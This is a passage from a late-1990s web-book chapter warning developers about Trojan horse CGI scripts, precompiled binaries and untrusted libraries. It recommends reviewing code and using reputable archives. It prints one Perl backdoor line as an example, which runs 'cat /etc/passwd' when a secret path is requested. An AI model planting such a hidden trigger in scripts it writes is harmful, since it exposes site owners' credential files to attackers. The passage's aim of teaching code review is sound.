Click Here!
home account info subscribe login search My ITKnowledge FAQ/help site map contact us


 
Brief Full
 Advanced
      Search
 Search Tips
To access the contents, click the chapter and section titles.

Platinum Edition Using HTML 4, XML, and Java 1.2
(Publisher: Macmillan Computer Publishing)
Author(s): Eric Ladd
ISBN: 078971759x
Publication Date: 11/01/98

Bookmark It

Search this book:
 
Previous Table of Contents Next


Using Others’ CGI Scripts

On the Web, many helpful archives of CGI scripts are available—each stuffed with dozens of useful, valuable programs—all free for the taking. But before you start haphazardly downloading all these gems and blindly installing them on your server, you should pause and consider a few things:

  Does the script come with source code?
  Do you know the language the program is written in well enough to really understand what it does?

If the answer to either question is no, you could be opening yourself up to a huge con game, doing the hacker’s work for him by installing a potentially dangerous CGI program on your own server. It’s like bringing a bomb into your house because you thought it was a blender.

These Trojan horse scripts—so named because they contain hidden dangers—might be wonderful time savers, doing exactly what you need and functioning perfectly, until a certain time is reached or a certain signal is received. Then, they will spin out of your control and execute planned behavior that can range from the silly to the disastrous.

Examining External Source Code

Before installing a CGI program that you didn’t write, you should take care to examine it closely for any potential dangers. If you don’t know the language of the script or if its style is confusing, you might be better off looking for a different solution. Look, for example, at this Perl fragment: 

system(“cat /etc/passwd”) if ($ENV{“PATH_INFO”} eq “/send/passwd”);

This single line of code can be hidden among thousands of others, waiting for its author or any surfer to enter the secret words that cause it to send him your password file.

If your knowledge of Perl is shaky, if you didn’t take the time to completely review the script before installing it, or if a friend assured you that he’s running the script with no problems, you can accidentally open your site to a huge security breach—one that you may not know about. The most dangerous Trojan horses won’t even let you know that they’ve gone about their work. They will continue to work correctly, silently sabotaging all your site’s security.

Guarding Against Precompiled C CGI Scripts

Occasionally, you may find precompiled C CGI scripts on the Web. These are even more dangerous than prewritten programs that include the source. Because precompiled programs don’t give you any way of discovering what’s actually going on, their “payload” can be much more complex and much more dangerous.

A precompiled program, for instance, might take the effort not only to lie in wait for some hidden trigger, but also to inform the hacker–cum–author where you installed it! A cleverly written CGI program might mail its author information about your machine and its users every time the script is run, and you would never know because all that complexity is safely out of sight behind the precompiled executable.

Reviewing CGI Library Scripts

Full-blown CGI scripts aren’t the only code that can be dangerous when downloaded off the Web. Dozens of handy CGI libraries are available as well, and they pose the same risks as full programs. If you never bother to look at what each library function does, you might end up writing the program that breaks your site’s security.

All a hacker needs is for you to execute one line of code that he wrote, and you’ve allowed him entry. You should review—and be sure that you understand—every line of code that will execute on your server as a CGI script. Remember, always look a gift horse in the mouth!

The Extremes of Paranoia and the Limits of Your Time

Although sight-checking all the code you pull off the Web is often a good idea, it can take huge amounts of time, especially if the code is complex or difficult to follow. At some point, you may be tempted to throw caution to the wind and hope for the best, installing the program and firing up your browser. The reason you downloaded a CGI program in the first place was to save time. Right?

If you do decide to give your paranoia a rest and run a program that you didn’t write, reduce your risk by getting the CGI script from a well-known and highly regarded site.

The NCSA httpd, for instance, is far too big for the average user to go over line by line, but downloading it from its home site at http://www.ncsa.uiuc.edu/ is as close to a guarantee of its integrity as you’re likely to get. In fact, anything downloaded from NCSA will be prescreened for you.

Dozens of well-known sites on the Web will have done most of the paranoia-induced code checking for you. Downloading code from any of them is another layer of protection that you can use for your own benefit. Such sites include the following:

  ftp://ftp.ncsa.uiuc.edu/Web/httpd/Unix/ncsa_httpd/cgi (NCSA Archive)
  http://www.ncsa.uiuc.edu/People/daman/cgi++/ (libcgi++, a C++ class library for decoding data sent from HTML forms to CGI programs)
  ftp://ftp.cdrom.com/pub/perl/CPAN/modules/by-category/15_World_Wide_Web_HTML_HTTP_CGI/ (home ftp site of Walnut Creek CD-ROM’s Comprehensive Perl Archive Network—CGI archive)
  http://www.perl.com/CPAN-local/CPAN.html (the Comprehensive Perl Archive Network, the official Perl source code archive)



Previous Table of Contents Next


Products |  Contact Us |  About Us |  Privacy  |  Ad Info  |  Home

Use of this site is subject to certain Terms & Conditions, Copyright © 1996-2000 EarthWeb Inc.
All rights reserved. Reproduction whole or in part in any form or medium without express written permission of EarthWeb is prohibited. Read EarthWeb's privacy statement.